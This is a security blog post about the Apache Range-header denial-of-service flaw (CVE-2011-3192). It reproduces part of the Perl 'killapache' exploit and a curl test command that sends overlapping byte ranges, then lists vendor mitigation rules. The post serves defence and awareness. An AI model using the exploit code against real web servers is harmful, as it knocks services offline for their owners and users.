A new dos vulnerability has been found for last days that affected apache web server’s a lot of versions that is on running linux operating systems such as centos,redhat and suse etc.This means that this exploit that permits possible dos/ddos attacks. Thus an attacker can use this vulnerability to break your web server, if Apache didn’t have sufficient security measure.Accually Apache’s vendors has not available a patch this vulnerability yet.I did test this vulnerability to break a apache server that have infected this exploit.I have already updated our IPS’s signatures to prevent this attack, but i just want show you this attack that how is working this attack  and want to explain to protect your web server until a full patch is release.

A section of the exploit code as perl.( I don’t want to show them all of code which has been already published since 19 Aug on every security bulletin)

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";

$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
    $p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;  

$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                                 Proto    => 'tcp');

You may either following and seeing these steps to prevent and to understand attack’s method.

We will sending a header that has request as “bytes=0-1,0-2″ to using curl.

curl -I -H "Range: bytes=0-1,0-2" -s host | grep Partial

So you are seeing a message started as http/1.1 this means that web server will  can receive a lot of new fork request until the server exhausted.(swap area will be filled)

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
    print "host seems vuln\n";
    return 1;
} else {
    return 0;
}
}

If web server doesn’t have vulnerability , you will getting as above notification.
(-Host does not seem vulnerable.)

However if web server has this vulnerability, exploit will attacking related to host of web server.

At this morning, I received a news about the this attack from our software vendors with email.They had made some recommendations to prevent dos attack untill available a full fix.In addition I want to share you these recommendations.

1) Use SetEnvIf or mod_rewrite to detect a large number of ranges and then either ignore the Range: header or reject the request.

Option 1: (Apache 2.0 and 2.2)

# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range

Option 2: (Also for Apache 1.3)

# Reject request when more than 5 ranges in the Range: header.
# CVE-2011-3192
#
RewriteEngine on
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
RewriteRule .* – [F]

2) Limit the size of the request field to a few hundred bytes. Note that while this keeps the offending Range header short – it may break other headers; such as sizeable cookies or security fields.

LimitRequestFieldSize 200

Note that as the attack evolves in the field you are likely to have to further limit this and/or impose other LimitRequestFields limits.

See: http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize

3) Use mod_headers to completely dis-allow the use of Range headers:

RequestHeader unset Range

Note that this may break certain clients – such as those used for e-Readers and progressive/http-streaming video.

4) Deploy a Range header count module as a temporary stopgap measure:

http://people.apache.org/~dirkx/mod_rangecnt.c

Precompiled binaries for some platforms are available at:

http://people.apache.org/~dirkx/BINARIES.txt

Referance:

http://www.securityfocus.com/bid/49303/info

Stay with safe.
Uğur Engin